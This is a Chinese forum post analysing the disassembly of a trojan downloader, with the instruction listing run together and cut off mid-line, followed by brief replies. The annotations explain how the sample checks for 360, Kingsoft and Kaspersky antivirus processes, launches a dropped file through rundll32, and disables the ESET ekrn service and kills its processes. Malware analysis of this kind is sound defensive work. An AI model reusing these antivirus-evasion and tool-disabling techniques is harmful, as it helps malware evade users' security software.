主题:Trojan.DL.Win32.Small.zuq简单分析
z3960发表于 2023-05-18 07:24
040425A50pusheax0040425BE8 6EF9FFFF call00403BCE ; 创建文件%temp%\~1476b8.t0040426083C4 14 add esp, 140040426368 F4010000 push1F400404268FF15 A8104000 calldword ptr []; kernel32.Sleep0040426EBF 30354000 mov edi, 00403530004042738BCBmov ecx, ebx0040427533C0xor eax, eax004042778D95 60FEFFFF lea edx, dword ptr 0040427DF2:AE repne scas byte ptr es:0040427FF7D1not ecx004042812BF9sub edi, ecx004042838BF7mov esi, edi004042858BC1mov eax, ecx004042878BFAmov edi, edx00404289C1E9 02 shr ecx, 20040428CF3:A5 rep movs dword ptr es:, dword p>0040428E8BC8mov ecx, eax0040429033C0xor eax, eax0040429283E1 03 and ecx, 3004042958D95 60FEFFFF lea edx, dword ptr 0040429BF3:A4 rep movs byte ptr es:, byte ptr>0040429D8DBD 5CFDFFFF lea edi, dword ptr 004042A38BCBmov ecx, ebx004042A5F2:AE repne scas byte ptr es:004042A7F7D1not ecx004042A92BF9sub edi, ecx004042AB8BF7mov esi, edi004042AD8BFAmov edi, edx004042AF8BD1mov edx, ecx004042B18BCBmov ecx, ebx004042B3F2:AE repne scas byte ptr es:004042B58BCAmov ecx, edx004042B74Fdec edi004042B8C1E9 02 shr ecx, 2004042BBF3:A5 rep movs dword ptr es:, dword p>004042BD8BCAmov ecx, edx004042BF8D45 CC lea eax, dword ptr 004042C283E1 03 and ecx, 3004042C550pusheax004042C6F3:A4 rep movs byte ptr es:, byte ptr>004042C8BE 20354000 mov esi, 00403520; :khqsn:^u:xqa004042CD8D7D CC lea edi, dword ptr 004042D0A5movsdword ptr es:, dword ptr 004042D1A5movsdword ptr es:, dword ptr 004042D2A5movsdword ptr es:, dword ptr 004042D366:A5 movsword ptr es:, word ptr 004042D5E8 65F9FFFF call00403C3F ; 解密字符串“AboutDlgProc”004042DA8D7D CC lea edi, dword ptr 004042DD8BCBmov ecx, ebx004042DF33C0xor eax, eax004042E18D95 60FEFFFF lea edx, dword ptr 004042E7F2:AE repne scas byte ptr es:004042E9F7D1not ecx004042EB2BF9sub edi, ecx004042ED8BF7mov esi, edi004042EF8BFAmov edi, edx004042F18BD1mov edx, ecx004042F38BCBmov ecx, ebx004042F5F2:AE repne scas byte ptr es:004042F78BCAmov ecx, edx004042F94Fdec edi004042FAC1E9 02 shr ecx, 2004042FDF3:A5 rep movs dword ptr es:, dword p>004042FF8BCAmov ecx, 
edx004043018D95 60FEFFFF lea edx, dword ptr 0040430783E1 03 and ecx, 30040430AF3:A4 rep movs byte ptr es:, byte ptr>0040430CBF 1C354000 mov edi, 0040351C;18004043118BCBmov ecx, ebx00404313F2:AE repne scas byte ptr es:00404315F7D1not ecx004043172BF9sub edi, ecx004043198BF7mov esi, edi0040431B8BFAmov edi, edx0040431D8BD1mov edx, ecx0040431F8BCBmov ecx, ebx00404321F2:AE repne scas byte ptr es:004043238BCAmov ecx, edx004043254Fdec edi00404326C1E9 02 shr ecx, 200404329F3:A5 rep movs dword ptr es:, dword p>0040432B8BCAmov ecx, edx0040432D8D45 E8 lea eax, dword ptr 0040433083E1 03 and ecx, 30040433350pusheax00404334F3:A4 rep movs byte ptr es:, byte ptr>00404336BE 14354000 mov esi, 00403514; o}vgp0040433B8D7D E8 lea edi, dword ptr 0040433EA5movsdword ptr es:, dword ptr 0040433F66:A5 movsword ptr es:, word ptr 00404341BE 0C354000 mov esi, 0040350C; 筒断004043468D7D F0 lea edi, dword ptr 00404349A5movsdword ptr es:, dword ptr 0040434AA4movsbyte ptr es:, byte ptr 0040434BE8 EFF8FFFF call00403C3F004043508D45 F0 lea eax, dword ptr 0040435350pusheax00404354E8 E6F8FFFF call00403C3F00404359BE FC344000 mov esi, 004034FC0040435E8D7D AC lea edi, dword ptr 00404361A5movsdword ptr es:, dword ptr 00404362A5movsdword ptr es:, dword ptr 00404363A5movsdword ptr es:, dword ptr 00404364A1 F4344000 mov eax, dword ptr [4034F4]00404369A5movsdword ptr es:, dword ptr 0040436ABE E8344000 mov esi, 004034E80040436F8D7D DC lea edi, dword ptr 00404372A5movsdword ptr es:, dword ptr 004043738945 F8 mov dword ptr , eax00404376A1 F8344000 mov eax, dword ptr [4034F8]0040437BA5movsdword ptr es:, dword ptr 0040437C8945 FC mov dword ptr , eax0040437F8D45 F8 lea eax, dword ptr 0040438250pusheax00404383A5movsdword ptr es:, dword ptr 00404384E8 EEF8FFFF call00403C77 ; 解密字符串“avp.exe”004043898D45 AC lea eax, dword ptr 0040438C50pusheax0040438DE8 E5F8FFFF call00403C77 ; 解密“safeboxtray.exe”004043928D45 DC lea eax, dword ptr 0040439550pusheax00404396E8 DCF8FFFF call00403C77 ; 解密“360tray.exe”0040439B8D45 DC lea eax, 
dword ptr 0040439E50pusheax0040439FE8 12FDFFFF call004040B6 ; 查找进程中是否存在360tray.exe 004043A48BF0mov esi, eax004043A68D45 AC lea eax, dword ptr 004043A950pusheax004043AAE8 07FDFFFF call004040B6 ; 查找进程中是否存在safeboxtray.exe004043AF0BF0oresi, eax004043B18D45 F8 lea eax, dword ptr 004043B450pusheax004043B5E8 FCFCFFFF call004040B6 ; 查找进程中是否存在avp.exe004043BA83C4 24 add esp, 24004043BD0BF0oresi, eax004043BF74 31 jeshort 004043F2 ; 如果不存在跳004043F2004043C18D85 60FEFFFF lea eax, dword ptr 004043C750pusheax004043C88D85 48FFFFFF lea eax, dword ptr 004043CE50pusheax004043CFE8 62FDFFFF call00404136 ; 如果存在以上某个进程则直走到这,创建进程rundll32.exe执行命令行“%Temp%\~1476b8.t,AboutDlgProc 18”004043D48B35 A8104000 mov esi, dword ptr [; kernel32.Sleep004043DA6A 64 push64004043DCFFD6callesi004043DE8D85 5CFDFFFF lea eax, dword ptr 004043E450pusheax004043E5FF15 C4104000 calldword ptr [; 删除%temp%\~1476b8.t004043EB68 204E0000 push4E20004043F0FFD6callesi; 暂停20秒复制代码退出线程
7C80B714E8 CF090000 callExitThread
5. 尝试打开 ekrn 服务(ekrn.exe / egui.exe 通常为 ESET 杀毒软件组件):如果服务存在,则通过 ChangeServiceConfigA 将其启动类型改为禁用,并执行命令行(taskkill)结束 ekrn.exe 和 egui.exe 进程。注:修改服务启动类型需要对该服务拥有 SERVICE_CHANGE_CONFIG 权限,因此这一步推测只有在样本以管理员权限运行时才能成功(本页未给出权限检查,待确认)。
00404017BE E0344000 mov esi, 004034E0; ASCII "suxp"0040401C8D7D F8 lea edi, dword ptr 0040401F8D45 F8 lea eax, dword ptr 00404022A5movsdword ptr es:, dword ptr 0040402350pusheax00404024A4movsbyte ptr es:, byte ptr 00404025E8 15FCFFFF call00403C3F ; 解密字符串“ekrn”0040402A8D45 F8 lea eax, dword ptr 0040402D6A 04 push40040402F50pusheax00404030E8 7CFFFFFF call00403FB1 ; 尝试打开ekrn服务,如果服务存在就通过ChangeServiceConfigA修改启动方式禁止服务00404035BE D4344000 mov esi, 004034D40040403A8D7D EC lea edi, dword ptr 0040403DA5movsdword ptr es:, dword ptr 0040403EA5movsdword ptr es:, dword ptr 0040403F8D45 EC lea eax, dword ptr 0040404250pusheax00404043A4movsbyte ptr es:, byte ptr 00404044E8 F6FBFFFF call00403C3F; 解密字符串"taskkill"00404049BE C4344000 mov esi, 004034C40040404E8D7D DC lea edi, d
回帖(3):
3 # 任逍遥
05-19 06:19
不错,了解了
2 # 任逍遥
05-19 06:19
来看一下
1 # 爱我中华
05-18 15:13
长知识了
